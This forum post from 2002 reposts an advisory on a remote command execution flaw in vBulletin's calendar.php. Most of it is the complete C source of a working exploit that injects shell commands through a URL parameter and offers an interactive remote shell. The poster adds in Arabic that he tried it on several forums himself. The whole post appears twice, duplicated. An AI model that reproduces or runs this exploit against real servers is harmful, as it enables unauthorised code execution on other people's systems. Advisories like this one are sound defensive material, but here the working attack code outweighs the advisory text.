FaReS
27-09-2002, 08:08
vBulletin Calendar Command Execution Vulnerability (Exploit)
Summary
A security vulnerability in vBulletin's Calendar PHP script allows remote attackers to cause the product to execute arbitrary code, usually under the user 'nobody'. This would allow a remote attacker to compromise parts of the operating system, possibly the complete operating system (by exploiting other vulnerabilities present to local users).
Details
Vulnerable systems:
* vBulletin version 2.2.0 and prior
Immune systems:
* vBulletin version 2.2.8
Solution:
Upgrade to the latest version of the product.
Exploit:
/* php2.c - Vbulletin/calender.php remote command execution exploit
*
* This code is published property of gosper
* leads to gid apache.
*
* thanks and shouts go out to ectos and tgrey ;)
*
* (C) COPYRIGHT Gosper , 2002 - gosper@nix.org
* all rights reserved
************************************************** *********************
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define PORT 80
#define MAX 200
#define evil1 "/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60"
#define evil2 "%20%60;die();echo%22"
char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);
int main(int argc, char *argv[])
{
char buf[MAX], *command, *path, *host;
int res;
extern char *optarg;
if(argc > 1) {
host = argv[1]; // make things easier
while((res = getopt(argc, argv, "i:c:p:d")) != EOF) {
switch(res){
case 'c': command = optarg;
break;
case 'i': path = optarg;
//sprintf(buf, "GET %s%s%s%s\n" , path , evil1, command, evil2);
interactive(host, path);
//exit(0);
break;
case 'd': printf("%s" , buf);
default: usage(argv[0]);
break;
}
}
sprintf(buf, "GET %s%s%s\n" , evil1, command, evil2);
exploit(host, buf);
}
else
usage(argv[0]);
return 0;
}
char exploit(char *host, char *string){
int fd, data;
char buf[MAX], buf2[999], output[5000];
struct hostent *he;
struct sockaddr_in server;
if((he =gethostbyname(host))==NULL) {
printf("Error unknown host :( \n");
exit(-1);
}
if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("Couldnt open socket\n");
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);
if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
printf("Couldnt connect to host\n");
exit(-1);
}
send(fd, string, sizeof(buf2), 0);
recv(fd, output, sizeof(output), 0);
printf("%s" , output);
close(fd);
}
void interactive(char *host, char *path) {
char shell[100], temp[MAX], *input;
printf("\n (C) Gosper 2002\n");
printf(" vbull, calendar.php exploit\n");
while(1){
printf("php# ");
fgets(shell, sizeof(shell), stdin);
search_replace(shell, " ", "%20");
input = malloc(strlen(shell)*sizeof(char));
memcpy(input, shell, strlen(shell)-1);
sprintf(temp, "GET %s%s%s%s\n" , path , evil1, input, evil2);
exploit(host, temp);
}
}
void search_replace(char *string, const char *find, const char *replace)
{
char final[MAX], temp[2];
size_t start, end, i;
while (strstr(string, find) != NULL) {
final[0] = '\0';
start = strstr(string, find) - string;
end = start + strlen(find);
temp[1] = '\0';
strncat(final, string, start);
strcat(final, replace);
for (i = end; string[i] != '\0'; i++) {
temp[0] = string[i];
strcat(final, temp);
}
sprintf(string, final);
}
return;
}
void usage(char *progname) {
printf("____________________________________\n");
printf(" calendar.php vbulletin exploit\n");
printf(" (C) COPYRIGHT Gosper 2002\n");
printf(" gosper@nix.org\n\n");
printf(" Usage: %s host -i path to calendar.php\n" , progname);
printf(" Ex: %s 127.0.0.1 -i /bbs\n" , progname);
exit(1);
}
الموضوع منسوخ من هنا (http://www.securiteam.com/exploits/5QP0P158AC.html)
جربت الثغره في أكثر من منتدى شخصيا ، لايوجد حل لها الا كما هو مذكور ترقية نسخة المنتدى فورا الى النسخه 2.2.8 ، حيث تم أغلاق الثغره فيها
Summary
A security vulnerability in vBulletin's Calendar PHP script allows remote attackers to cause the product to execute arbitrary code, usually under the user 'nobody'. This would allow a remote attacker to compromise parts of the operating system, possibly the complete operating system (by exploiting other vulnerabilities present to local users).
Details
Vulnerable systems:
* vBulletin version 2.2.0 and prior
Immune systems:
* vBulletin version 2.2.8
Solution:
Upgrade to the latest version of the product.
Exploit:
/* php2.c - Vbulletin/calender.php remote command execution exploit
*
* This code is published property of gosper
* leads to gid apache.
*
* thanks and shouts go out to ectos and tgrey ;)
*
* (C) COPYRIGHT Gosper , 2002 - gosper@nix.org
* all rights reserved
************************************************** *********************
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define PORT 80
#define MAX 200
#define evil1 "/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60"
#define evil2 "%20%60;die();echo%22"
char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);
int main(int argc, char *argv[])
{
char buf[MAX], *command, *path, *host;
int res;
extern char *optarg;
if(argc > 1) {
host = argv[1]; // make things easier
while((res = getopt(argc, argv, "i:c:p:d")) != EOF) {
switch(res){
case 'c': command = optarg;
break;
case 'i': path = optarg;
//sprintf(buf, "GET %s%s%s%s\n" , path , evil1, command, evil2);
interactive(host, path);
//exit(0);
break;
case 'd': printf("%s" , buf);
default: usage(argv[0]);
break;
}
}
sprintf(buf, "GET %s%s%s\n" , evil1, command, evil2);
exploit(host, buf);
}
else
usage(argv[0]);
return 0;
}
char exploit(char *host, char *string){
int fd, data;
char buf[MAX], buf2[999], output[5000];
struct hostent *he;
struct sockaddr_in server;
if((he =gethostbyname(host))==NULL) {
printf("Error unknown host :( \n");
exit(-1);
}
if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("Couldnt open socket\n");
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);
if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
printf("Couldnt connect to host\n");
exit(-1);
}
send(fd, string, sizeof(buf2), 0);
recv(fd, output, sizeof(output), 0);
printf("%s" , output);
close(fd);
}
void interactive(char *host, char *path) {
char shell[100], temp[MAX], *input;
printf("\n (C) Gosper 2002\n");
printf(" vbull, calendar.php exploit\n");
while(1){
printf("php# ");
fgets(shell, sizeof(shell), stdin);
search_replace(shell, " ", "%20");
input = malloc(strlen(shell)*sizeof(char));
memcpy(input, shell, strlen(shell)-1);
sprintf(temp, "GET %s%s%s%s\n" , path , evil1, input, evil2);
exploit(host, temp);
}
}
void search_replace(char *string, const char *find, const char *replace)
{
char final[MAX], temp[2];
size_t start, end, i;
while (strstr(string, find) != NULL) {
final[0] = '\0';
start = strstr(string, find) - string;
end = start + strlen(find);
temp[1] = '\0';
strncat(final, string, start);
strcat(final, replace);
for (i = end; string[i] != '\0'; i++) {
temp[0] = string[i];
strcat(final, temp);
}
sprintf(string, final);
}
return;
}
void usage(char *progname) {
printf("____________________________________\n");
printf(" calendar.php vbulletin exploit\n");
printf(" (C) COPYRIGHT Gosper 2002\n");
printf(" gosper@nix.org\n\n");
printf(" Usage: %s host -i path to calendar.php\n" , progname);
printf(" Ex: %s 127.0.0.1 -i /bbs\n" , progname);
exit(1);
}
الموضوع منسوخ من هنا (http://www.securiteam.com/exploits/5QP0P158AC.html)
جربت الثغره في أكثر من منتدى شخصيا ، لايوجد حل لها الا كما هو مذكور ترقية نسخة المنتدى فورا الى النسخه 2.2.8 ، حيث تم أغلاق الثغره فيها